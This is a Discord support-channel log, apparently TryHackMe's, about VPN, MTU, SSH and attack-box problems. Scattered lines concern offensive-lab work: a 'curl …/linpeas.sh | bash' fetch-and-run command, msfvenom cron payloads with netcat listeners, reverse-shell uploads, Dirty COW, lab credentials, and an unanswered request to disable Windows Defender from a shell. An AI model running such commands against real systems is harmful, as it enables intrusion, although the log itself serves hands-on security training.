#site-support

It's using tun interface

You will have a tun0

wait a sec

it just logged me in the ssh

i changed something else

one moment

the find worked

i changed mtu from 1500 to 1200

and removed the fragment 1300

Yes that works I think

lemme check it

it works

Awesome

im so confused

the command i did supposedly changed my mtu to 1200

So just to recap and help anyone with the same problem

What all steps did you take

ah i already have a big long message

one moment

So basically, i can ssh into any device that i own (phone for example) without the openvpn, but i cannot ssh into any of the THM machines, this is the problem that i was trying to fix
2nd, you have told me that old kali instances have a networking problem, therefore i needed to download a new one and hopefully it would work,
I go on to download the new kali disc, 2.2gb, then i notice once its at 1.5gb that it was for vmware not virtual box,
Had to cancel it and download the viritual box one 3.3gb
5 hours later (slow network)
The disc finished installing, i set it up, added root user instead of having to sudo and logged in as root;
now, openvpn doesn't want to work for some reason, it just freezes then does Restart sleep 5, so now, my problem is in openvpn not ssh'ing, i go on thm and try to fix this openvpn problem, i download the trouble shooter, it doesnt wanna execute, the reason being instead of typing chmod +x i did -x,I execute the troubleshooter
it says theres more than one instance open, it closes it and successfully connects me to THM's open vpn ( this process of trying to get troubleshooter to work was around 30m-1hr)
Now, ssh, its time! to see if it works!
i deploy the machine! open the openvpn, no pun intended, and type the magic command, ssh shiba1@ip
and then poof, nothing.
I go back to THM's discord,
We talk, they gave me many many solutions that took me around 1Hr again to try and do, but ive done most of them with no result
Then, someone, out of the blue, writes one line and posts one site,

umm is this that mtu bug?
i had this like in one of my ubuntu machines.
https://serverfault.com/questions/210408/cannot-ssh-debug1-expecting-ssh2-msg-kex-dh-gex-reply```

i open the site, theres two commands in it
the site says pick one command
I pick the first one, cuz apparently they both do same thing,
it doesnt work, invalid wlan0, i read a little more, it says change wlan0 if it doesnt work use iwconfig to find your name, i do the command

, i get eth0, i use eth0 instead of wlan0, something happened, i have no idea, i go back, try to ssh, and it works.

but then ssh kept frozing, so adding tun-mtu 1200 to the ovpn config and mssfix fixed it instead of running the site command

alright that should be the full recap

of what i did

to fix ovpn n ssh

but then ssh kept frozing, so adding tun-mtu 1200 to the ovpn config and mssfix fixed it instead of running the site command
@upper dune That is awesome

Glad it worked out and thanks for the recap

but then ssh kept frozing, so adding tun-mtu 1200 to the ovpn config and mssfix fixed it instead of running the site command
@upper dune Which mssfix method exactly?

basically i used the mtu fix

from the site

and that made ssh work

but freezing

but adding tun-mtu 1200 to ovpn worked isntead of tuning my mtu w the site command

the troubleshooter was the one to solve the mssfix

and it detected a background process to ovpn aswell that it closed on its own

and adding mssfix to the ovpn config file aswell for future reference

instead of having to use troubleshooter each time

All right that's fine

Basically the difficulties are because of burp suite not working the right way

And my guess it it's an open Issue on Kali OS

https://forum.portswigger.net/thread/v2020-7-embedded-browser-doesn-t-launch-on-parrot-7fdb090b

@fading oriole #room-help and please remove the first image as it contains answers.

^

This is where this issue appears

Done

And I start to wonder if I'm the only one having this problem or how you guys use Burpsuite the right way...

Crap I think I'm again on the wrong channel...

Open Browser is quite a new feature . Are you aware that you can use you own browser and set it up to work with burp if the in built browser is giving you issues

Haven't made it work yet but probably I should give it another try when the other way fails...

hey guys, may i ask you something. I have problems connecting to VPN. I can't really connect to VPN.. It just terminated with no error immediately when i am trying to connect.. A friend of mine also tried right now with no result. Any support please? Thanks in advance .

i get this error when i try to connect with openvpn, what can i do to fix this??

o lol, we both asked the same question at the same time

Regenerate

Wait 30-60 seconds

Download

That's a different question, you have an error message

What are you connecting from?

Do you mean my location? If yes, we are from Greece.

No

I mean what device?

Windows, linux?

Linux

The latest kali

How are you trying to connect? From the command line?

from network manager

Don't do that

It adds bad routes

to my vpn provider, i can connect with no problem

Hm, okay

i will try, ty

There's a reason all the tutorials tell you to use the openvpn command line program

okay okay ty

same error then hah

o boi, welcome to the club

Regenerate Wait 30-60 seconds Download

That's the solution

If that doesn't work, please tell me what VPN server you're currently using

And then chose a different one

i tried EU-Regular-2, it didnt work for me, so now im going to try 1

@vapid dawn I think EU2 is spitting out broken configs again

number 1 works!

2020-11-21 21:46:13 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2020-11-21 21:46:13 ERROR: Endtag </tls-auth> missing
2020-11-21 21:46:13 Exiting due to fatal error

Regenerate

Redownload

ok it works now, thank you for your time!!!

what is my discord token for?

in my profile settings

Linking to the bot to get your level role

cool

thanks!

kind of obscure question

but wfuzz shows you progress right?

like you can see every request it does

even with --hc i distinctly remember it would print every request

and if it didn't match a filter it would just get overwritten

But now it doesn't

it just stays blank

which sucks because i cant see the progress anymore

Hi

@warm spear can u please make a ping when the issue of subscription gets solved

Wrong channel, try #infosec-general

what issue?

The zip code issue

Hi. I forget cancel my subscription before renew. Can I get refund?

I don't think that's possible but email support and see what they say.

What is their email?

hello@tryhackme.com

ty

hello

i need help please

Can you be less vague please?

ok sorry

my connection stuck at TLS: Initial packet from [AF_INET]18.202.129.195:1194, sid=9cdf414e ee4e29f7

Could you show a screenshot of your output please so it can helps us understand better

1 sec

here

same when i try to connect to HTB

Regenerate your file and wait for 30s and retry if that doesn't work try switching servers

i'm struggling with this problem for a month i tried everything

Are you in Egypt or another country that blocks VPNs?

yes im in Egypt

There's your problem

oh ..

what should i do now

Your country blocks OpenVPN.

Hi.

Happy to subscribe for the first time!

Question, can I cancel the subscription at any time without losing my current benefits?

Yeah it will run until your time is out

is there any way i can avoid this block

Bypassing government restrictions starts to get legally dodgy so we can't encourage you to

oh don't worry our government is a bunch of morons

if you know how to bypass this problem tell me please

Uh oh.

Like James said we can't tell you how because that will be against your country laws

As he said, we really won't encourage you to. You are free to do your own research tho

It gets legally uncomfortable so we can't

okay you did what you could i understand

thanks anyway

ah that's out of my hands, I can't solve that so you'll have to wait until Skidy / Ashu do it

My dashboard is still never loading @deep trellis

My dashboard is still never loading @deep trellis
@narrow birch Whats your THM username?

akiisqt

@deep trellis also

Enable DMs in TryHackMe.

That's a your privacy settings

ah

hey somewhy its taking ages to connect to OpenVpn server anything I can do?

Could you show a screenshot of your output please

sorry I tried everything from beginer and can not understand anythig

Show a screenshot of your output please

I don't know what problem you're having

So. My friend has a problem with ssh on thm. He connects, then he can do stuff and after some time the shell freezes. It's not his internet as far as I can tell because I've had this multiple times now, even with another friend. But then after some time, like a minute or two, it just continues like nothing happened. Any ideas on how to fix that?

!vpnscript

hi i'm back are you sure my country is the problem

Yes

Egypt blocks OpenVPN traffic

k

I'm having real trouble staying connected to the VPN, currently using a standard Kali linux box on virtual box on a Windows 10 machine. Using openvpn 2.5.0 but every couple of minutes it seems to reset the connection and drops everything I'm doing. Other days I've been better off and it seems to work for quite a while but today i'm just about logging into a box and starting to look around and I get booted off. It takes a minute or two to connect again after and then repeats. Log file seems to always show the following just as I get booted

vpn_log.txt

any ideas? I'm at a complete loss at the moment

Try a different VPN server from the dropdown

Make sure you're connected in the VM and NOT the host

Ah I hadn't realised I could change the server, I'll give that a go, thanks

sorted, seems to be working fine now, thanks so much

Hey yesterday I think I was at my 7th or 9th streak or something like that I still have 3 hours left but today it shows me 1 streak but the countdown still didn't end yet

I just did for today, and the streak is at 2 but yesterday I was 7+

Ask the room creator or send mail to support.

I have a problem.After I terminate a machine , I can deploy other machines but cannot ping them .Have to wait for 2 3 minutes to run the machines and again after 1 minute I cannot connect to the box.

Hello there

I need to reset all my rooms

I want to start the rooms from scratch

Please email support@tryhackme.com with a list of rooms you would like to be reset and your tryhackme site username

Ok tnx

Need a little help in connecting openvpn to tryhackme

I downloaded the GUI app in my windows 10 device then downloaded the configuration file

Then imported it in openvpn

But it just shows connecting and never connects

Would it be possible to transfer a membership on my old account to my new account?

Okk I got it..

@sterile totem use the command line and do "sudo openvpn file.ovpn"

If that doesnt work do "sudo bash" then the openvpn command

You will have issues with reverse shells on your kali

im trying to seek help for booting in parrot os....i get a error saying failed to start postgresql cluster 12-main

#infosec-general #general that's not directly THM related

Hello, is there a way, I could reset a room? so I could go through it again if need be? I don't need to now but I may want to ???

Email hello@tryhackme.com for room resets

excuseme

anyone have some tips for disable Windows Defenders from shell?

Hi All, I have accessed "My Machine" from the dashboard but it keeps saying "box initializing" and "connecting", any advice? Is this the correct channel to post this in?

I've got systemshell and administrators group shell

This channel is for directly THM related tech support like site and VPN issues.

ok thanks 🙂

That wasn't directed to you @pale sluice

oh sorry

... sorry...

Could you show a screenshot please

sure

What happens when that public IP timer expires?

Also redact those creds

it says access in desktop and the the timer just runs

It's working

it keeps saying reconnecting though, I am I doing something wrong? 🙂

Here is says reconnecting again

Sorry @eager fulcrum maybe Im missing something

Terminate, deploy again

OK will do

Thank you very much

#general

I can’t download my vpn conf file it just gives a 404 error

I can download throwback vpn but not the normal one

Check the pins

I just did it and I’m getting a fatal error when trying to connect to the VPN

Screenshot

I’m waiting for food

I have all the ssl packages I can think of downloaded

This is what I get for letting my subscription run out 😔

I can't read that, it's not a screenshot

Regenerate your config

wait 30-60 seconds

Download again

I

K

If that's not helping, switch VPN Server and also let me know which server you were using @meager bobcat

I am getting "cannot load inline certificate " when connecting using openvpn in kali

How to solve it?

Could you show a screenshot please

Yeah

Regenerate your VPN config

Did that already but it's still not working

Try switching server.

what do you mean by try switching server

im running into the same issue as the people above

Go to the access page then you can switch the openvpns server

Is the site not working?

I can't see my pfp

And the images in tmux room are not visible too

The site is working fine

Also i can't connect to vpn

what error are yo getting?

im still not able to connect to vpn afte changing region too

Are you in Egypt jvortho?

Ameria east

America

I mean do you live in Egypt?

Code 101 network is unreachable

no America

i was connected earlier and no longer can

Try regenerating and wait 30 secs

ok

Ok

That wasn't directed at you Yaymorek

Aight

@tropic cape That's WSL1 right?

What should i do ?

The VPN won't work on WSL1.

WSL1 doesn't have a proper network stack etc

ok

Try a hard refresh

Okay

Yes..done..all good

Trying to ssh into shiba1, and it's denying access when prompted to enter password. Can you help please?

Where did you get the IP address that you're using?

What's the message that you see when you try it?

What password are you entering?

Can you take a screenshot please?

It's the ip of the machine you are using right? shiba1 is the password. If both of them are correct I will send you a screen shot. Thank you.

@long star You need the IP under the big red "Active Machine Information" header

If you don't have one, click Deploy in the first task

Do not use the IP of the attackbox or your VPN IP

Lol I now have the correct information. Completely new to the site. I wasn't clicking deploy on the room lol. My bad.

Hello everyone, I just installed a fresh version of the latest kali linux 2020.4, and so far it's been working rather well with a few minor tweaks, but for some reason the TryHackMe machines do not want to open on my webbrowser... I am connected to the openvpn successfully, I can ping the addresses with responses... but in the browser (or even curl) ... just hangs forever.

Any idea what may be causing this?

Nevermind, figured it out... it was my mtu setting being too high, had to lower it down to 1250 - works like a charm now. Cheers all.

hey everyone, I'm trying to exploit a cronjob using msfvenom on a target machine and its giving me this error, "msfvenom: command not found"...

any idea why this is happening?

hi guys

how do i boot this windows 10

said reboot to continue system change

Because msfvenom won't be on the target machine, you should be using msfvenom your attackbox.

so im suppose to run msfvenom on host machine and paste the output in my cronjob script on the target machine right?

and then use netcat listener on my host machine ?

im in the common linux privesc room btw

that's the jist of it.

It's been a while since I've done this, you should go to #room-help

this isn't really a tech-support question.

ah, i see you've already posted there, give me a moment to have a look

yeah, wasn't getting any response from there, thanks

Hi everyone!

I am trying to complete the room NIS - Linux Part I however the SSH credentials do not work (chad:Infinity121 *). Can someone confirm the problem and/or fix the VM?

can someone tell me why I can't use shell to meterpreter?

@undone axle You already have a meterpreter

You can't use shell_to_meterpreter on a meterpreter shell

It's meant for non meterpreter shells

The shell you get has been changed since the room was created, so you can skip over this part if you want

oh

then

why room blue asks me to run it?

^

Hello!
Someone have this problem with John (after unshadow shadow passwd)?

some context please

try #general or #infosec-general cause it's not THM related

No its THM ;)
Priv esc Linux with Tib3rius

but this channel is for technical problems with THM not for problems with tools

Oh okay sorry! :p

Anyone having an issues with the VPN?

what is the problem?>

It could be a UI issue, I do seem to be connected as I have a 10.9 address.

Don't trust access page.

I just don't see it saying connected with a green symbol

!vpnscript

Try this.

Thanks, I think it is just a UI issue.

Yeah, sometimes it lies. You can type `ip a and see there if you have tun0 or not.

Also, you can type http://10.10.10.10 in browser and check this way.

Yes I had to run basic, checks to see I'm still connected which is the case. Never seen it not appear before on the UI.

hi here who speaks german and can help me with vpn under kali linux

I don't speak German, but I can try and help you with your VPN Issue if you keep it in English

this is my mistake '2020-11-24 14:08:24 DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-256-CBC' to --data-ciphers or change --cipher 'AES-256-CBC' to --data-ciphers-fallback 'AES-256-CBC' to silence this warning.
2020-11-24 14:08:24 OpenVPN 2.5.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Oct 28 2020
2020-11-24 14:08:24 library versions: OpenSSL 1.1.1g 21 Apr 2020, LZO 2.10
2020-11-24 14:08:24 OpenSSL: error:0909006C:PEM routines:get_name:no start line
2020-11-24 14:08:24 OpenSSL: error:140AD009:SSL routines:SSL_CTX_use_certificate_file:PEM lib
2020-11-24 14:08:24 Cannot load inline certificate file
2020-11-24 14:08:24 Exiting due to fatal error
' i get

Change the Server, regenerate the config, wait 30 seconds and download it again

See if that helps

nice man it workt i strugle so long on tihs

@pure bough what VPN server were you using to get that error?

open vpn

but now it workt

No what VPN server

now eu 1

Awesome, Which server were you on before ?

Which one gave you the error

Shoot, I was on the old message

and bevor it worse 2

Hey ! Can I get some support with installing kali on vbox ?

#infosec-general

Okay! Sorry!

got the solution

Hey, I need help with question from room Network Services / Task 7 Exploring Telnet
I generate msfvenom payload
start nc listenning
then I copy the payload on victim machine
and nothing happends :/

Brute IT: I am trying this box as a freebie. had the same issues yesterday and I tried again today same issue. The issue is that it looks like Apache isn't running on this box?

Is there anyway I can have this verified please.

Are you sure you are scanning the right IP Address

@vernal ruin yes sudo nmap -sV -sS -sC 10.10.52.148

@vernal ruin but I have a 10.10 ip adddress as always?

I think you’re scanning the attack box ip not the deployed ip

Deploy the machine in the room, scan that IP

@vernal ruin so what you are saying is that 10.10.52.148 is my attcking ip address?

Looks like it

Thanks me being a NOOB sorry got it thanks for the help all

Hey guys I am using a Kali VM with openVPN and am having issues connecting via ssh to Common Linux Privesc. I can confirm the vpn is working as i have access to 10.10.10.10. I can ping the deployed server and can see ssh is on the default port via a portscan. When I try to connect via ssh is just takes a long time and looks like this:
└─$ ssh user3@10.10.141.212
Connection closed by 10.10.141.212 port 22

Weirdly enough, I can acess the machine in the browser and get the default ubuntu-apache page. Any suggestions?

Hello, as I have already said I have a problem with the OVPN file. When I try to connect via openvpn I get the following error text:

2020-11-24 11:15:39 OpenSSL: error:140AD009:SSL routines:SSL_CTX_use_certificate_file:PEM lib

Also the cert section in the file is completely empty, unlike the hackthebox file. It looks like this: <cert> </cert>
If I regenerate the file or change the server location to eu1, this does not change anything.
I hope someone can help me. I have tested with the windows openvpn gui and the kali kinux terminal.

Change to EU1

Regenerate

Redownload

same error

Are you sure you're over writing the old one?

i have clicked regenerate. Then came a "Success! Your OpenVPN has been regenerated. Please wait 10 seconds for it to re-generate" and then I clicked on download. This file I then executed with sudo openvpn "<path to the downloaded file>.ovpn"

Did you wait 30-60 seconds before clicking download?

I just noticed that when I select the American servers and download everything works and there is no error. It only occurs on the EU servers. And no I have not waited 30 to 60 seconds

It recommendeds 10, I recommend 30-60

i need help with live booting kali with persistance

#infosec-general @naive dust

okk

^ With more details if possible

i waited a while keep the same error. But the american servers worked greate for me too. So i can use them instant. i don't know why i get the errors by the eu servers

Got it done?

Can anyone help me with my vpn connect? I connect to my virtualbox, booted with kali and pluged in my network adapter and I'm able to connect to the internet. But if I run my openvpn then try to scan a tryhackme box it won't work. I was able to connect to my own network interface while connected to the vpn. This makes me think that it's the vpn that is not working. Are there any fixes?

!vpnscript

ty

The regeneration worked for me aswell ! Thank you !

Hi all. Hope everyone is doing good. I was wondering if there is a way to open multiple vms via the browsee

Or do I need OpenVPN to be able to scan or access another vm from the platform?

In order to communicate with a VM you've deployed on THM, you need to be on the network with them

The AttackBox/THM Kali is already on the network

The VPN puts you on that network, so you can use your own device.

The target VMs, you're not given access to

The In Browser Access is a feature of the attackbox, THM Kali, and a few other boxes that you're given access to.

The goal is to hack in to the target VMs most of the time

Or use credentials that you're given to connect, usually not using the browser.

Got it. Thanks for the info.

(reposting from #room-help)
I keep getting this error when trying to connect to this box. I have also tried using freerdp like xfreerdp /u:administrator /p:P@$$W0rd /cert:ignore /v:10.10.51.xx but it's also not connecting

Is there anything that I can try or is there a problem atm?

maybe it's intended, i can ssh in just fine so

Is there any way to open a python http.server on port 80 while using the attackbox?

You can if you kill the service that's already binding to it which is exposing VNC for the in-browser (:

So if you're using it purely through SSH that's an option, otherwise, afraid not

It looks like the credentials that the in-browser uses for that is expired/out-of-date. You'd have to use RDP/SSH for the time being whilst that gets updated @lyric junco. Pretty sure you've gotta provide the domain too (:

ohhh

As a heads up, the small window works without port 80 but the fullscreen doesn't

yeah probably because i didnt list the domain

That's actually really interesting

i used the same xfreerdp command which I used for Tib3rius' BOF room , so i thought that it should have worked

i didnt really read the error message beyond could not connect though

not a problem, using SSH is fine for now 🙂

thanks

I don't think that one for Tib's is domain joined unlike post-exploit 😄

yep youre right

i didnt

I tried it out for a room of mine

And it's uh

😄

Weird

That's yeah

a weird one

@eager fulcrum woaah thanks so much, u saved me a ton of time haha

When i try to open my attackbox or kali machine in a new tab aka fullscreen, i receive an error page

thmVNC encountered an error:

is nikto a super touchy program?

I've ran the same 3 scans as the guides and am not getting the output.

ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Operation now in progress

!vpnscript

Hey guys, my web pages are not loading, any idea why that might be? it just hangs, but never loads.

!vpnscript

Ok, is anything else not working?

the webpages just hang and never load. Its the 2nd machine that this is happening.

Ok that sounds like the MTU issue, lemme just check something rq

Is this directly TryHackMe related?

Hey, i've worked on 1 day on tryhackme and i still don't got how to get into deployed ip. I'm from Mongolia. i've tried openVpn. And it still loading. What should i do? can i know to nearest server ?

Are you definitely connected to the VPN?

Can you load http://10.10.10.10 ?

No, it have not.

Ok, what OS are you connecting from?

Windows.

still kind of hangs

yeah, MTU issue

I did it with virtual linux tho.

Can i get more information about it, Please?

Linux is much easier to troubleshoot, can you show us what your terminal shows when you try to connect

I wasn't talking to you, it's probably not your issue.

I meant about MTU thingy, Sorry.

Yes

So am I

I wasn't talking to you about MTUs.

It's not likely to be your problem

Got it, Sorry

James, what would you like to see?

I don't need to see anything, I need someone else to document the fix so I can link it

oh

@stable jolt Please try to connect to the VPN from Linux, and screenshot what you see in your terminal

Linux is much easier to troubleshoot than Windows for me.

Windows is a pain

On this, what would you recommend for me.?

I asked you to do something to help me troubleshoot

Please do that thing.

Troubleshoot? how.? I'm confused.

Leave everything as default unless you know what you're doing and why you're changing it.

This.

This is what I asked you to do

I can't help you unless you do that.

Oh got it. I don't have linux. But i got log file

You said you tried Linux

Virtual Kali linux.

On tryHackMe web

Web Kali Linux

That doesn't require the VPN

Got it, Sorry For wasting your time. Thanks.

You will still need the VPN running in Windows if you want to use Windows for it

Which I recommend against

Hello, I am doing the Linux Privilege Escalation room. It says to send LinEnum.sh to the target machine by setting up a python server and using wget on the target machine. But whenever I try to use wget on the target machine it just hangs at connecting. Using this method works if I try it through my own terminal or by copying the ip into the web browser. It just does not seem to want to connect when I am trying it whilst SSH'd into the box. I was originally trying to use my local IP and upon watching a guide of someone doing this box on youtube, I saw that he used the internal virtual ip, I was hopeful that this was the issue but it still doesn't work. Any ideas

?

#room-help and show screenshot.

you can try this instead of wget

curl http://<your tun0 ip>/linpeas.sh | bash

Im in the tutorial and totally new to this and it says Navigate to /opt: cd /opt - Im putting in cd /opt at the command line but its not navigating to /opt: what am I doing wrong1

I'm on the room where I learn about metasploit but when I try to run cmd: run -j then I get this error ```[*] Started reverse TCP handler on 192.168.0.29:4444
[-] 10.10.154.16:8000 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (10.10.154.16:8000).

Wrong LHOST

It should be your THM IP

and how do I get that?

type ip addr then you'll see it under tun0

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 9c:fc:e8:da:a7:e1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.29/24 brd 192.168.0.255 scope global dynamic noprefixroute wlan0
       valid_lft 2967sec preferred_lft 2967sec
    inet6 fe80::3457:877e:6012:36c/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
```I'm probably very blind but I can't see it

yeah okay forget it

I was just not connected by openvpn

weird it didn't work earlier

but thank you anyway

Hi @everyone , is there anyone who can help me i cant access TryHackMe properly i tried everything i changed several thing like

1. Operating System
2. Regenerate VPN servers and also changed servers
3. Change MTU to 1200

The following things i can do:

1. ping
2. nmap
3. gobuster

The following things i can't do:

1. ssh
2. upload php-reverse-shell (browser wont response when i do that)

Hello,

I can no longer logon to my Attack Machine using SSH, the password 'shiba1' no longer allows access.

I have had this problem for weeks now, but I was able to logon before that numerous times, any ideas ??

are you subscribed @oak falcon

Yes,

My subscription has just renewed

what error do you get?

Access Denied when entering password

I'm currently attempting to connect to 10.10.194.86, with no change today

Has the password changed ??

I tried a few variations 'admin', 'shiba01', 'shiba'

my username is 'bax2097'

if you want to connect to your kali in browser machine you need the credentials next to the machine

I'm doing the Learn Linux course, and need to connect using SSH using Putty, I have got to Task 9

The Windows Putty client, it was working fine

user shiba1 password shiba1

Yes

User: shiba1@10.10.194.86, Password: shiba1

todays IP obviously

Are you using the deployed ip or the attack box ip?

Attack Box ip

I'll screen-shot it

You need to deploy the ip click the green box and it will give you an ip

you need to the active machine ip

In task 1 click the green box that says deploy

Screen shot

I'm already connected using OpenVPN, and I get the cert warning when trying to connect using Putty

Click the green box in task 1

That will give you your ip

OK sorry

if you use your attackbox you don't need openvpn then you can ssh in the attackbox through the terminal

Oh, let me try again

Hello

Hello

I m doing year of the rabbit room
But after running dirty cow for privilege escalation the connection is getting lost and I m not able to re connect using ssh

try and redeploy the machine

OK, I do need OpenVPN to connect ??

not when you use the attackbox

If I again run the kernel exploit
It get stuck

Pretty sure Muir just told you to do it the intended way and not use a kernel exploit unless it's a last resort

Network timeout now, when using OpenVPN I was getting to the password stage

Trying to deploy again

You need to ssh into the deployed machine, not the attack box

You either connect to the VPN and ssh into the deployed machine

Or ssh to the deployed machine using the attack box

can anyone help me with this

what is the problem?

the problem is that he tried to notify 36000 in the server for his problem

Did you run the VPN troubleshooter?

yes i did

You have to be a bit more descriptive.

It seems to be a VPN issue to me.

i regenerated the VPN as well but didnt work and changed servers as well

@quartz hawk are you double VPNing? like using wireguard on your host then using THM vpn?

nope i am not

windows firewall?

how should i check if its not in windows firewall issue

because i just install fresh windows 10 yesterday and just update from windows update centre

you could try disabling windows firewall to troubleshoot then create firewall rules as needed if thats the issue

i disable all my firewall from windows and tried again but didn't worked

i get the same error : Connection closed by <machine_ip> port 22

try sshing somewhere from your windows machine without being on the thm vpn to get a better idea where to start troubleshooting

i can ssh in my aws and hostgator

without any issue

Than Google openvpn not connecting on windows

Or Linux

Plenty of documentation.

We’re happy to help but it’s tough to diagnose.

https://cdn.discordapp.com/attachments/781156008856125461/781157332788707348/unknown.png

https://cdn.discordapp.com/attachments/781156008856125461/781157496391598112/unknown.png

and i can nmap the machine

Send output of ps aux | grep openvpn

Oh you’re connected

If you can’t ssh, it isn’t a VPN issue.

then what it can be

Do you have a box up with SSH?

box up?

Yeah you can’t ssh to a machine without ssh open.

oh yah i have

Which one?

https://cdn.discordapp.com/attachments/781156008856125461/781162381400342528/unknown.png

No Not that

then

A room deployed on THM

oh ok

That has SSH open.

i tried in basic pen testing

and rrootme

hydra room as well

I am driving currently. @candid yacht sorry for interrupting.

cant connect any room

sorry not rroot me

you're good dude. error, try throwing on the -v flag when youre trying to ssh to a thm box. might give you an idea whats going on

in rrootme i cant upload php shell file

i tried -vv and -vvv

here are outputs

@quartz hawk run this ifconfig wlan0 mtu 1200

and try again

see if that fixes it

already changed mtu to 1200

and didnt worked

and if that doesn't work try this sudo ip li set mtu 1400 dev eno1

ok wait let my try

mine is eth0

so i use eth0 or eno1

idont know what eno1 is

use the name of your interface

^

ok got it

Did that resolve your problem?

All fixed now thanks

@torn citrus IIRC it's the tun0 interface that should be adjusted

Yeah, I just copied the first result from Google.

he can change the interface to anything.

but I believe that's his issue.

nah didnt worked

Strange

did you try what James said?

sudo ip li set mtu 1400 dev tun0

instead

yes i did tun0 as well

didnt worked

I've finished a room a long time ago and want to redo it. Is there any way to reset or something alike?

send email to support@tryhackme.com with the room code that you want to reset

And your username preferably

#general

How do i find room code?

It's in the address bar

/room/whatever

ninja, still no solution for the mtu issue?

anybody having issues with images loading on learning path pages?

I use the machine from the browser. I did not know that as a paying customer I was able to run the Kali linix machine and deploy the machine on the session I was working. Thanks

Huh?

Deploying the machine is the same process no matter what

I mean. I went to the my-machine site and ran the Kali machine. Then when to the room I was working and deployed the machine for the exercise there. Got two different IPs and was able to SSH to it.

Went*

Is anyone available to give me some help?

If you ask a question, yes

I am doing the Linux Privilege Escalation room. It says to send LinEnum.sh to the target machine by setting up a python server and using wget on the target machine. But whenever I try to use wget on the target machine it just hangs at connecting. Using this method works if I try it through my own terminal or by copying the ip into the web browser. It just does not seem to want to connect when I am trying it whilst SSH'd into the box.

Room VMs do not have internet access

The rooms instructions say to do it this way, I watched a guide online to see how someone else did it, and they just ssh'd into the box and used the command and it worked

they were able to transfer the file to it

paste your wget command

wget http://10.9.196.153:8000/LinEnum.sh

the ip being the virtual ip the vpn gave me

if i type that same command in from my own terminal the python server says "10.9.196.153 - - [26/Nov/2020 02:24:17] "GET /LinEnum.sh HTTP/1.1" 200 -
" and then i download the file

but when i do it from the user3@mild junglebox I am ssh'd into i just get "Connecting to 10.9.196.153:8000..."

That's the tun0 ip when you run ifconfig on your kali machine?

That is the virtual ip the vpn has given me, i am not using the kali machine. I am doing it from my own OS

I ssh'd into it from terminal

i will start an attack box now and try it through the kali linux VM

Try that because from what you're describing, the wget should work

Yeh, thats why I have come here. because I watched a youtube video of a guy doing it and he did nothing different to me

and ofcourse, the instructions on the room say to do this

on the kali linux vm is just says connection refused

Can you ping the kali machine or your own machine from the target?

PING 10.9.196.153 (10.9.196.153) 56(84) bytes of data.
64 bytes from 10.9.196.153: icmp_seq=1 ttl=63 time=29.1 ms
64 bytes from 10.9.196.153: icmp_seq=2 ttl=63 time=27.6 ms
64 bytes from 10.9.196.153: icmp_seq=3 ttl=63 time=27.9 ms

I did that from within the SSH'd terminal on my desktop and the ip is the Internal Virtual IP Address from open vpn

I am also having issues. The walk through says "MACHINE_IP" instead of the ip of the machine. I am in the PLEB linux walkthrough. Any advice?

I just tried another wget for a url and its doing the same thing, its like the shh'd machine can not wget out, which it should be able to based on the rooms instructions

the thing is, i can get around this by just simply copy and pasting the contents of the script over into a file, but I am just confused why this method wont work

Connecting to 10.9.196.153:8000... failed: Connection timed out.
Retrying.

--2020-11-25 21:51:44-- (try: 2) http://10.9.196.153:8000/LinEnum.sh
Connecting to 10.9.196.153:8000...

it just does that

@trim tartan click the deploy button.

try curl 10.9.196.153:8000/LinEnum.sh > LinEnum.sh

user3@mild junglebox:~$ curl 10.9.196.153:8000/LinEnum.sh > LinEnum.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:19 --:--:-- 0

just a timer going up

weird you can get a ping but http traffic won't work

yeh very strange

@eager fulcrum It is deployed. I am in the deployed machine. I cannot SSH. And there is something strange, where I have to use a different IP with putty than what the deployed machine has.

theres zero response on the python server

That's the wrong IP, you've only deployed the attack box

but if i do it from my own terminal/browser i will get "10.9.196.153 - - [26/Nov/2020 02:52:21] "GET /LinEnum.sh HTTP/1.1" 200 -
"

Click the deploy button in task 1. @trim tartan

try reconnecting to the vpn and rebooting your machine?

I did that last night when i had the same issue

I can proceed by just copy pasting the scripts contents over manually which is fine I guess

but would be nice to have this method working

and from a learning perspective, to understand why its not working

@eager fulcrum It is there now. Took a minute. Thanks

Only other suggestion I have is to try to wget in a different room or generating a new openvpn file or resetting your home internet

I will try them options now, thank you

will update you on the results shortly

good luck

Silly question, but what if you were to just do something like "curl 10.9.196.153:8000/LinEnum.sh -o LinEnum.sh" @static iron

Ah, it's not just curl that's not working

mb just catching up

will try it once i have done it with a fresh openvpn file on a different vpn server

np mate

I always use the trusty netcat method

Let's have a quick deploy

So I generated a new OpenVPN file and tried it again on both the original rooms box and another. And still the same issue.

just hanging at connecting

with not even an error response from the terminal running the python3 http.server

Okies sooo here's the result of my try using the AttackBox:

Only method I can't get working is SCP

I am not using the actual attack box, I am doing it through SSH on my OS

Ah if it doesn't work in another room then gotta be routing your side. How are you running the VPN on your device? I.e. in a virtual machine, or on the host itself (like Windows 10)

I am using linux mint and running the command "sudo openvpn "filename"

then its open in a terminal

then im running python3 -m http.server 8000 in the directory where the file is

and ssh'ing into the box using user3@"boxip" and using the wget

Sounds about right to me!

yeh thats whats strange

everything should be working fine

That's a bit of an odd one, could I DM you to try something please? 😄

yeh sure, im more than happy to go in a call and share my screen

if thats ok with you

dont have to talk can type, but ill show you my desktop

Yeah sure, It's 3AM here so I'll be muted but go for it

same, you from the uk?

Aye lad 👍

@zealous yoke I'd suspect MTUs tbh

It's always MTUs lately

